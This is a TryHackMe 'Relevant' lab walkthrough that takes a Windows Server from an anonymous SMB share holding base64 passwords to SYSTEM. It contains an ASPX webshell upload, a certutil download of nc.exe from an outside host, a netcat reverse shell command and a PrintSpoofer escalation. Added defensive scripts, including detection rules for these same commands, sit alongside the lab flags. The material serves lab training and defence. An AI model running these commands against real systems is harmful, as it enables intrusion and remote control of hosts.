TryHackMe Relevant Walkthrough: From Anonymous Share to SYSTEM
2026-02-18 09:14:40 Author: infosecwriteups.com

Ram

Some machines fight you.

Some machines hide.

And then there are machines like Relevant that quietly leak a small clue and unravel completely.


The box doesn’t require any guessing, wordlists, or brute force.

It requires paying attention.

We’ll go through it with a real attacker’s mindset:

  1. Enumeration
  2. Web Footprinting
  3. Initial Foothold
  4. Privilege Escalation

Enumeration

Every engagement starts the same way: ask the machine who it is.

┌──(root㉿ryuk)-[/home/ryuk]
└─# nmap -A -p- 10.49.185.22
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-17 15:07 -0500
Nmap scan report for 10.49.185.22
Host is up (0.0071s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2026-02-17T20:10:32+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2026-02-16T20:06:06
|_Not valid after: 2026-08-18T20:06:06
|_ssl-date: 2026-02-17T20:11:11+00:00; -1s from scanner time.
49663/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: RELEVANT; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2026-02-17T12:10:32-08:00
| smb2-time:
| date: 2026-02-17T20:10:34
|_ start_date: 2026-02-17T20:06:06
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h35m59s, deviation: 3h34m39s, median: 0s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 3.82 ms 192.168.128.1
2 ...
3 4.80 ms 10.49.185.22

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.87 seconds

When I saw the scan results it felt like the box was hinting at its weakness. Windows Server 2016 with IIS on two ports, SMB open, RDP exposed and SMB signing disabled. In CTFs when Windows, SMB and a web server appear together I stop attacking the webpage and think about moving files instead. So I focused on the network first because that is usually where the real entry point is.
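The reasoning in the paragraph above (SMB plus IIS on one host, a guest session accepted, signing not enforced, RDP exposed) can be turned into a repeatable triage of the scan output. The script below is an added example, not code from the original write-up: it parses the plain-text report format that `nmap -A` prints and returns the findings a defender would raise. `SAMPLE_REPORT` is a trimmed copy of the article’s scan output; the severity labels and the wording of each finding are this script’s own choices.

```python
"""Triage an `nmap -A` text report for the findings the scan above surfaces.

Added example, not part of the original write-up. It parses the plain-text
report nmap prints (port table plus NSE script output) and returns the items
a defender would raise. SAMPLE_REPORT is a trimmed copy of the article's scan
output; the severity labels and wording of the findings are this script's own.
"""
import re

SAMPLE_REPORT = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server Microsoft Terminal Services
49663/tcp open http Microsoft IIS httpd 10.0
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
"""

# One port-table row: "445/tcp open microsoft-ds <version text>".
# \s+ tolerates both nmap's column padding and whitespace collapsed by copy-paste.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_ports(report):
    """Return the port-table rows as dicts."""
    ports = []
    for line in report.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
    return ports


def parse_smb_flags(report):
    """Pull the SMB security-mode facts out of the NSE script output."""
    text = report.lower()
    return {
        "smb1_signing_disabled": "message_signing: disabled" in text,
        "smb2_signing_not_required": "message signing enabled but not required" in text,
        "guest_session": "account_used: guest" in text,
    }


def triage(report):
    """Return (severity, message) findings, highest-impact items first."""
    ports = parse_ports(report)
    flags = parse_smb_flags(report)
    open_ports = {p["port"]: p for p in ports if p["state"] == "open"}
    web_ports = [port for port, info in open_ports.items() if info["service"] == "http"]
    findings = []
    if 445 in open_ports and web_ports:
        findings.append(("HIGH", f"SMB (445) and HTTP ({', '.join(map(str, web_ports))}) on one host: "
                                 "check whether any share backs a web-served directory"))
    if flags["guest_session"]:
        findings.append(("HIGH", "SMB accepted a guest/null session: review what it can list and disable anonymous access"))
    if flags["smb1_signing_disabled"] or flags["smb2_signing_not_required"]:
        findings.append(("MEDIUM", "SMB signing not required: enforce it via policy so captured authentication cannot be relayed"))
    if 3389 in open_ports:
        findings.append(("MEDIUM", "RDP (3389) reachable: restrict it to a management network and require NLA"))
    if len(web_ports) > 1:
        findings.append(("INFO", "IIS bound on several ports: enumerate each site's virtual directories separately"))
    return findings


if __name__ == "__main__":
    for severity, message in triage(SAMPLE_REPORT):
        print(f"[{severity}] {message}")
```

Feeding it the full report from a real run works the same way; the port regex keys on the `N/tcp` prefix, so the traceroute and OS-guess sections are ignored.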

We run smbclient with a null session and spot an unusual share name.

┌──(root㉿ryuk)-[/home/ryuk]
└─# smbclient -L 10.49.185.22
Password for [WORKGROUP\root]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.49.185.22 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

A custom share. That’s rarely accidental. Let’s open it:

┌──(root㉿ryuk)-[/home/ryuk]
└─# smbclient //10.49.185.22/nt4wrksv
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 25 17:46:04 2020
.. D 0 Sat Jul 25 17:46:04 2020
passwords.txt A 98 Sat Jul 25 11:15:33 2020

7735807 blocks of size 4096. 4928016 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (3.1 KiloBytes/sec) (average 3.1 KiloBytes/sec)
smb: \> exit

This machine is already telling a story: a password file on an anonymous share. Let’s see what we got:

┌──(root㉿ryuk)-[/home/ryuk]
└─# cat passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

┌──(root㉿ryuk)-[/home/ryuk]
└─# echo -n "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d;echo""
Bob - !P@$$W0rD!123

┌──(root㉿ryuk)-[/home/ryuk]
└─# echo -n "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d;echo""
Bill - Juw4nnaM4n420696969!$$$

So we have credentials, but we should check what they can actually do on the shares before using them. The permission listing below is in smbmap’s output format:

[+] IP: 10.49.185.22:445        Name: 10.49.185.22              Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
nt4wrksv READ, WRITE
[*] Closed 1 connections

This changes everything: with write access to the share, we can get our own files onto the server and, if the web server serves that directory, have it execute them. Let’s move forward and get those flags.

Web Footprinting

If IIS is running and a writable share exists, the question becomes:

Is this share mapped to the web server?


We upload “aspx_cmd.aspx”, an ASPX webshell that runs commands from the browser; it is available on GitHub.

┌──(root㉿ryuk)-[/home/ryuk]
└─# smbclient //10.49.185.22/nt4wrksv -U 'Bob%!P@$$W0rD!123'

Try "help" to get a list of possible commands.
smb: \> put aspx_cmd.aspx
aspx_cmd.aspx does not exist
smb: \> put aspx_cmd.aspx
putting file aspx_cmd.aspx as \aspx_cmd.aspx (23.7 kB/s) (average 23.7 kB/s)
smb: \> dir
. D 0 Tue Feb 17 15:26:39 2026
.. D 0 Tue Feb 17 15:26:39 2026
aspx_cmd.aspx A 558 Tue Feb 17 15:26:39 2026
passwords.txt A 98 Sat Jul 25 11:15:33 2020

7735807 blocks of size 4096. 5101869 blocks available
smb: \> exit

Working path for the file:

http://10.49.185.22:49663/nt4wrksv/aspx_cmd.aspx

We need to confirm whether it worked.


We have RCE, but we need a proper shell, so we upgrade.
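The question this section asks, “is the share mapped to the web server?”, is one a defender can answer from inventory before anyone uploads anything. The script below is an added example, not code from the write-up: it cross-references SMB share ACLs against IIS virtual-directory physical paths and flags every directory that low-privilege principals can write to and IIS serves. The inventory is constructed to mirror the article; the share paths, the `reports` and `downloads` shares, and the ACLs are assumptions (the box’s real paths are not given). On a live server the same data comes from `Get-SmbShare` / `Get-SmbShareAccess` and `Get-WebVirtualDirectory`; the field names here are this script’s own.

```python
"""Find SMB shares that low-privilege principals can write to AND that IIS
serves, i.e. the share-to-web mapping this box turns into code execution.

Added example, not part of the original write-up. The inventory is
constructed to mirror the article (share paths and ACLs are assumptions).
On a live server the same data comes from Get-SmbShare / Get-SmbShareAccess
and Get-WebVirtualDirectory; the field names below are this script's own.
"""
import ntpath
from dataclasses import dataclass

# Principals that any domain member, guest or anonymous session can act as.
LOW_PRIV_PRINCIPALS = {"everyone", "anonymous logon", "guest",
                       "authenticated users", "users", "builtin\\users"}
WRITE_RIGHTS = {"full", "change"}


@dataclass
class Share:
    name: str
    path: str
    access: dict  # principal -> "Full" | "Change" | "Read"


@dataclass
class WebDir:
    host: str
    port: int
    virtual_path: str
    physical_path: str
    script_exec: bool  # handler mappings allow .aspx/.asp to run here


# Constructed inventory (not collected from the real box).
SHARES = [
    Share("ADMIN$", r"C:\Windows", {"BUILTIN\\Administrators": "Full"}),
    Share("C$", "C:\\", {"BUILTIN\\Administrators": "Full"}),
    Share("nt4wrksv", r"C:\nt4wrksv", {"Everyone": "Full"}),
    Share("reports", r"D:\reports", {"Authenticated Users": "Change"}),
    Share("downloads", r"C:\inetpub\wwwroot\dl", {"Everyone": "Read"}),
]
WEBDIRS = [
    WebDir("10.49.185.22", 80, "/", r"C:\inetpub\wwwroot", True),
    WebDir("10.49.185.22", 49663, "/nt4wrksv", r"C:\nt4wrksv", True),
]


def norm(path):
    """Case-fold and normalise a Windows path so prefix checks are reliable."""
    return ntpath.normcase(ntpath.normpath(path)).rstrip("\\")


def writable_by_low_priv(share):
    """Principals from LOW_PRIV_PRINCIPALS holding write rights on the share."""
    return sorted(p for p, right in share.access.items()
                  if p.lower() in LOW_PRIV_PRINCIPALS and right.lower() in WRITE_RIGHTS)


def overlaps(share_path, web_path):
    """True when one path is the other or lies beneath it."""
    s, w = norm(share_path), norm(web_path)
    return s == w or s.startswith(w + "\\") or w.startswith(s + "\\")


def audit(shares, webdirs):
    """Every (writable share, web directory) overlap, worst first within a share."""
    findings = []
    for share in shares:
        writers = writable_by_low_priv(share)
        if not writers:                      # read-only or admin-only: no upload path
            continue
        for wd in webdirs:
            if not overlaps(share.path, wd.physical_path):
                continue
            findings.append({
                "severity": "CRITICAL" if wd.script_exec else "HIGH",
                "share": share.name,
                "writers": writers,
                "url": f"http://{wd.host}:{wd.port}{wd.virtual_path}",
                "reason": "low-privilege write access to a web-served directory"
                          + (" with script execution enabled" if wd.script_exec else ""),
            })
    return findings


if __name__ == "__main__":
    for finding in audit(SHARES, WEBDIRS):
        print(finding)
```

The `reports` share is writable but not served, and `downloads` is served but read-only, so neither is reported; only `nt4wrksv` satisfies both halves of the condition, which is exactly the relationship the box depends on.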

Initial Foothold

Start a listener in one terminal and host nc.exe over HTTP in another.

#Start listener
rlwrap nc -lvnp 4444
#Host Netcat
python3 -m http.server 80

Back in the browser, use the webshell to download nc.exe onto the victim, then execute the reverse shell:

#Download it on the victim
certutil -urlcache -f http://192.168.223.118/nc.exe C:\Windows\Temp\nc.exe
#Execute reverse shell
C:\Windows\Temp\nc.exe -e cmd.exe 192.168.223.118 4444

If you execute the above steps properly you’ll be rewarded with:

┌──(ryuk㉿ryuk)-[~]
└─$ rlwrap nc -lvnp 4444

listening on [any] 4444 ...
connect to [192.168.223.118] from (UNKNOWN) [10.49.185.22] 49937
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
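Every step of the foothold above leaves a distinctive process-creation record: the IIS worker spawning `cmd.exe`, `certutil -urlcache -f` pulling a file over HTTP, and a binary in `C:\Windows\Temp` launched with `-e cmd.exe` under the app-pool identity. The detection below is an added example, not part of the original write-up; `EVENTS` is constructed telemetry with Sysmon Event ID 1 style fields that mirrors the article’s commands, and the rule names and the choice of scratch directories are this script’s own.

```python
"""Detect the foothold chain above from process-creation telemetry: a web
worker spawning a shell, certutil used as a downloader, and a netcat-style
reverse shell launched from a scratch directory under the app-pool identity.

Added example, not part of the original write-up. EVENTS is constructed with
Sysmon Event ID 1 style fields to mirror the commands in the article; the
rule names and directory list are this script's own.
"""
import re
from collections import defaultdict

EVENTS = [  # constructed sample telemetry
    {"ProcessId": 2101, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami", "User": r"IIS APPPOOL\DefaultAppPool"},
    {"ProcessId": 2102, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -f http://192.168.223.118/nc.exe C:\Windows\Temp\nc.exe",
     "User": r"IIS APPPOOL\DefaultAppPool"},
    {"ProcessId": 2103, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\Temp\nc.exe",
     "CommandLine": r"C:\Windows\Temp\nc.exe -e cmd.exe 192.168.223.118 4444",
     "User": r"IIS APPPOOL\DefaultAppPool"},
    {"ProcessId": 2104, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs", "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessId": 2105, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verify cert.cer", "User": r"RELEVANT\Bob"},
]

WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SCRATCH_DIRS = ("c:\\windows\\temp\\", "c:\\users\\public\\")
DOWNLOAD_RE = re.compile(r"-urlcache\b.*https?://")
REVERSE_SHELL_RE = re.compile(r"\s-e\s+(cmd|powershell)(\.exe)?\b")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rules_for(event):
    """Return the names of every rule the event matches."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd, user = event["CommandLine"].lower(), event["User"].lower()
    hits = []
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append("webshell_shell_spawn")        # w3wp.exe -> cmd.exe
    if image == "certutil.exe" and DOWNLOAD_RE.search(cmd):
        hits.append("certutil_download")           # LOLBin fetch over HTTP
    if REVERSE_SHELL_RE.search(cmd):
        hits.append("netcat_style_reverse_shell")  # "-e cmd.exe" argument
    if event["Image"].lower().startswith(SCRATCH_DIRS) and user.startswith("iis apppool\\"):
        hits.append("apppool_exec_from_scratch_dir")
    return hits


def detect(events):
    """Per-event alerts, in arrival order."""
    alerts = []
    for ev in events:
        hits = rules_for(ev)
        if hits:
            alerts.append({"pid": ev["ProcessId"], "image": ev["Image"], "rules": hits})
    return alerts


def rules_by_user(events):
    """Distinct rules each identity tripped. Several on one app-pool account
    is the chain above, not a handful of unrelated oddities."""
    seen = defaultdict(set)
    for ev in events:
        for rule in rules_for(ev):
            seen[ev["User"].lower()].add(rule)
    return dict(seen)


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
    print(rules_by_user(EVENTS))
```

The benign `certutil -verify` run by Bob and the `services.exe` child stay silent, while the app-pool identity trips four rules across three events; correlating by user, as `rules_by_user` does, is what turns three medium-confidence hits into one high-confidence incident.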

Now, we need to get the user.txt flag. It’s easy to find once you are in.

Once I had the shell, I started poking around the usual places and headed straight for the C:\Users folder. There were three profiles, but Bob stood out since we already knew his name from the password file. Inside his Desktop sat a small but satisfying reward: user.txt. Opening it confirmed we had user-level access.

C:\Users\Bob\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is AC3C-5CB5

Directory of C:\Users\Bob\Desktop

07/25/2020 01:04 PM <DIR> .
07/25/2020 01:04 PM <DIR> ..
07/25/2020 07:24 AM 35 user.txt
1 File(s) 35 bytes
2 Dir(s) 20,899,524,608 bytes free

C:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}

Privilege Escalation

Now comes the real target. First we check the privileges:

c:\windows\system32\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

I looked up how this privilege is abused on Windows Server 2016. With SeImpersonatePrivilege enabled, Windows Server 2016 is essentially a green light for a token impersonation exploit, so I went with PrintSpoofer.
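Reading a `whoami /priv` table for privileges that hand their holder another security context is something a defender should do for every service identity, not just when an attacker already has a shell. The script below is an added example, not code from the write-up: it parses the table, lists the sensitive privileges present, and notes the caveat the table hides, that a privilege shown as Disabled is still held and can be enabled by the process. `SAMPLE_PRIV` is the article’s table with the garbled last row repaired; the `SENSITIVE` list and its descriptions are this script’s own.

```python
"""Parse `whoami /priv` output and flag privileges that give their holder a
route to another security context, the way SeImpersonatePrivilege does above.

Added example, not part of the original write-up. SAMPLE_PRIV is the
article's table with the garbled last row repaired; SENSITIVE is this
script's own list of privileges worth reviewing on any service identity.
"""

SAMPLE_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# Privileges that let a holder act as another principal or bypass object ACLs.
SENSITIVE = {
    "SeImpersonatePrivilege": "impersonate any client token the process can obtain",
    "SeAssignPrimaryTokenPrivilege": "start a new process under another token",
    "SeDebugPrivilege": "open and read any process, LSASS included",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
}


def parse_privs(text):
    """Return {name: {"state": ..., "description": ...}} from whoami /priv output.
    The first token is the name and the last is the state, so the parser copes
    with both whoami's column padding and whitespace collapsed by copy-paste."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = {"state": parts[-1], "description": " ".join(parts[1:-1])}
    return privs


def sensitive_held(privs):
    """(name, state, why) for every sensitive privilege present in the token.
    A 'Disabled' state still counts: a process can enable a privilege it holds."""
    return [(name, info["state"], SENSITIVE[name])
            for name, info in privs.items() if name in SENSITIVE]


def assess(text, identity):
    """Summarise the token for one identity (e.g. the IIS app-pool account)."""
    privs = parse_privs(text)
    held = sensitive_held(privs)
    return {
        "identity": identity,
        "privileges_parsed": len(privs),
        "sensitive": held,
        # Any sensitive privilege on an identity an attacker can run code as is
        # a full escalation path. The privilege itself may be required (IIS
        # app pools impersonate clients by design), so the durable fix is to
        # deny the code execution, not only to strip the right.
        "escalation_path_exists": bool(held),
    }


if __name__ == "__main__":
    report = assess(SAMPLE_PRIV, r"IIS APPPOOL\DefaultAppPool")
    for name, state, why in report["sensitive"]:
        print(f"{name:32} {state:9} {why}")
    print("escalation path:", report["escalation_path_exists"])
```

Note that SeAssignPrimaryTokenPrivilege is reported even though the table shows it Disabled; together with SeImpersonatePrivilege it is the pair that token-impersonation tooling such as the one used above looks for, so a listing that only counted Enabled rows would understate the exposure.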

First I pulled the binary onto the machine, then ran it, and boom: full control.

C:\Users\Bob\Desktop>cd C:\Windows\Temp

C:\Windows\Temp>certutil -urlcache -f http://192.168.223.118/PrintSpoofer64.exe PrintSpoofer64.exe

certutil -urlcache -f http://192.168.223.118/PrintSpoofer64.exe PrintSpoofer64.exe
**** Online ****
CertUtil: -URLCache command completed successfully.

C:\Windows\Temp>PrintSpoofer64.exe -i -c cmd

PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

After taking a moment to work out the exact path for root.txt, I finally had it.

C:\Windows\system32>type c:\users\administrator\\desktop\root.txt
type c:\users\administrator\\desktop\root.txt
THM{1fk5kf469devly1gl320zafgl345pv}

What I Learned From The Lab

Relevant isn’t about exploiting software.

It’s about understanding relationships between services. Each step alone looked harmless.

Most real attacks don’t break systems.
They connect features that were never meant to interact.

And that’s exactly what made this machine… Relevant.


Source: https://infosecwriteups.com/tryhackme-relevant-walkthrough-from-anonymous-share-to-system-140b3b74a15d?source=rss----7b722bfd1b8d---4